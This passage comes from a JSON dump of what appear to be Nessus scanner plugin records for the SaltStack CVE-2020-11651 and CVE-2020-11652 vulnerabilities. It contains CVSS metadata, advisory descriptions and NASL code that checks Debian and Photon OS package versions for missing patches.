These methods allow arbitrary\ndirectory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/salt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"salt-cloud\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-common\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-doc\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-master\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-minion\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-ssh\", reference:\"2014.1.13+ds-3+deb8u1\")) 
flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-syndic\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:09", "description": "An update of the salt package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Salt PHSA-2020-1.0-0294", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/136694", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136694);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-master-2019.2.4-1.ph1\")) flag++;\nif 
(rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:30", "description": "An update of the salt3 package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Salt3 PHSA-2020-3.0-0091", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", 
"CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0091_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136699", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0091. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136699);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2020-3.0-0091\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-91.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 3.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-api-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-cloud-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-master-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-minion-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-proxy-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-spm-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-ssh-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-syndic-2019.2.4-1.ph3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:12:37", "description": "An update of the salt3 package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Salt3 PHSA-2020-1.0-0294", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136695", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136695);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-master-2019.2.4-1.ph1\")) flag++;\nif 
(rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:27", "description": "According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to 2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the ClearFuncs class due to improper validation of method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerability exists in the ClearFuncs class due to improper path sanitization. 
An authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "nessus", "title": "SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:saltstack:salt"], "id": "SALTSTACK_3000_2_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/136402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136402);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", 
value:\"2020-A-0195-S\");\n script_xref(name:\"EDB-ID\", value:\"48421\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of SaltStack running on the remote server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerability exists in the ClearFuncs class due to improper path sanitization. 
An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)\");\n # https://labs.f-secure.com/advisories/saltstack-authorization-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4df67f57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SaltStack version 2019.2.4, 3000.2 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 